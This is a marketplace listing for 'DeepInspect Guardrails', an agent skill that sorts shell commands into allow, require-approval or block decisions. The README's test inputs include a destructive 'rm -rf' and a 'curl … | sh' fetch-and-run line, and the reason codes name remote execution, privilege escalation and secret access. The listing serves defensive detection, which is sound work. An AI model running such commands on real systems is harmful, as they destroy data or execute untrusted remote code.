← Back to Skills Marketplace
parmindersk

DeepInspect Guardrails

by parmindersk · GitHub ↗ · v1.0.0
cross-platform ✓ Security Clean
584
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install deepinspect-openclaw-guardrails
Description
Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.
README (SKILL.md)

OpenClaw Guardrails (MVP)

DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.

What it does (MVP)

  • Classifies requested command risk
  • Returns allow, require_approval, or block
  • Emits reason codes for explainability
  • Uses a baseline balanced profile in policy.baseline.json

Decision outputs

  • allow
  • require_approval
  • block

Reason codes (examples)

  • REMOTE_EXEC_PATTERN
  • DESTRUCTIVE_PATTERN
  • PRIVILEGE_ESCALATION_PATTERN
  • SYSTEM_MUTATION_PATTERN
  • SECRET_ACCESS_PATTERN
  • OUTSIDE_WORKSPACE_PATH

Local usage

node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"

Run tests

node skills/openclaw/guardrails/tests/decide.test.js

How to tune policy

Edit:

  • workspaceRoots
  • allowlistedDomains
  • highRiskPatterns
  • actions

in policy.baseline.json.

Usage Guidance
This skill appears to implement what it claims: a local preflight classifier for shell-like commands. Before installing or running it: (1) ensure you have Node.js available (SKILL.md assumes node but required-binaries is empty), (2) review and, if needed, adjust policy.baseline.json.workspaceRoots to match your actual project workspace so OUTSIDE_WORKSPACE_PATH detection is meaningful, (3) verify the allowlistedDomains entry if you expect network checks (the code doesn't use it), and (4) because the source is 'unknown', inspect the included files yourself before granting any automation privileges — running the CLI locally is low-risk, but don't enable autonomous invocation in an environment where unreviewed skills can run commands without supervision.
Capability Analysis
Type: OpenClaw Skill Name: deepinspect-openclaw-guardrails Version: 1.0.0 This skill bundle implements a security guardrail system designed to classify command-like actions based on predefined risk patterns. The code in `src/decide.js` and `policy.baseline.json` explicitly looks for indicators of malicious behavior (e.g., remote execution, destructive commands, privilege escalation, secret access, sensitive path access) to block or require approval for such actions. The `SKILL.md` documentation accurately describes this purpose and provides examples for testing the guardrail's detection capabilities, not for the agent to execute maliciously. There is no evidence of data exfiltration, malicious execution, persistence mechanisms, or prompt injection attempts against the agent; rather, the skill aims to prevent these very actions.
Capability Assessment
Purpose & Capability
The name/description match the implementation: the code classifies command strings into allow/require_approval/block and emits reason codes. The policy file contains patterns and actions that the code uses. One minor inconsistency: policy.baseline.json contains an allowlistedDomains field that is not referenced by the implementation (harmless but unused).
Instruction Scope
SKILL.md directs local use of the provided node CLI and tests. The instructions and code only read the bundled policy file and the provided command string; they do not access external endpoints, environment secrets, or unrelated system configuration.
Install Mechanism
No install spec is present (lowest risk) and all code is local. However, SKILL.md and the CLI require node to run but the registry metadata lists no required binaries — this is a minor coherence gap (you need node/npm on PATH to run the skill). There are no remote downloads or archive extracts.
Credentials
The skill requests no environment variables or credentials and the code does not read secrets or config paths beyond the included policy file. The policy flags patterns that match sensitive paths (e.g., ~/.ssh, /etc) but the skill only detects those patterns rather than accessing those files.
Persistence & Privilege
The skill does not request persistent presence, does not write global agent configuration, and does not require elevated privileges. The skill is user-invocable and not always-enabled.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install deepinspect-openclaw-guardrails
  3. After installation, invoke the skill by name or use /deepinspect-openclaw-guardrails
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Initial release of OpenClaw Guardrails: - Provides deterministic risk classification for command-like actions: allow, require_approval, or block. - Emits reason codes for explainability (e.g., REMOTE_EXEC_PATTERN, DESTRUCTIVE_PATTERN). - Uses a baseline policy profile (policy.baseline.json) for decisions. - Includes local CLI for testing command classifications. - Supports policy tuning via editable JSON settings.
Metadata
Slug deepinspect-openclaw-guardrails
Version 1.0.0
License
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is DeepInspect Guardrails?

Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes. It is an AI Agent Skill for Claude Code / OpenClaw, with 584 downloads so far.

How do I install DeepInspect Guardrails?

Run "/install deepinspect-openclaw-guardrails" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is DeepInspect Guardrails free?

Yes, DeepInspect Guardrails is completely free (open-source). You can download, install and use it at no cost.

Which platforms does DeepInspect Guardrails support?

DeepInspect Guardrails is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created DeepInspect Guardrails?

It is built and maintained by parmindersk (@parmindersk); the current version is v1.0.0.

More Skills
self-improving agent
Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Clau...
⬇ 463556 · by pskoett
Skill Vetter
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
⬇ 259610 · by spclaudehome
Polymarket
Query Polymarket prediction markets. Check odds, find trending markets, search events, track price movements.
⬇ 232503 · by joelchance
Self-Improving + Proactive Agent
Self-reflection + Self-criticism + Self-learning + Self-organizing memory. Agent evaluates its own work, catches mistakes, and improves permanently. Use when...
⬇ 200551 · by ivangdavila
Github
Interact with GitHub using the `gh` CLI. Use `gh issue`, `gh pr`, `gh run`, and `gh api` for issues, PRs, CI runs, and advanced queries.
⬇ 191226 · by steipete
ontology
Typed knowledge graph for structured agent memory and composable skills. Use when creating/querying entities (Person, Project, Task, Event, Document), linkin...
⬇ 190235 · by oswalpalash

💬 Comments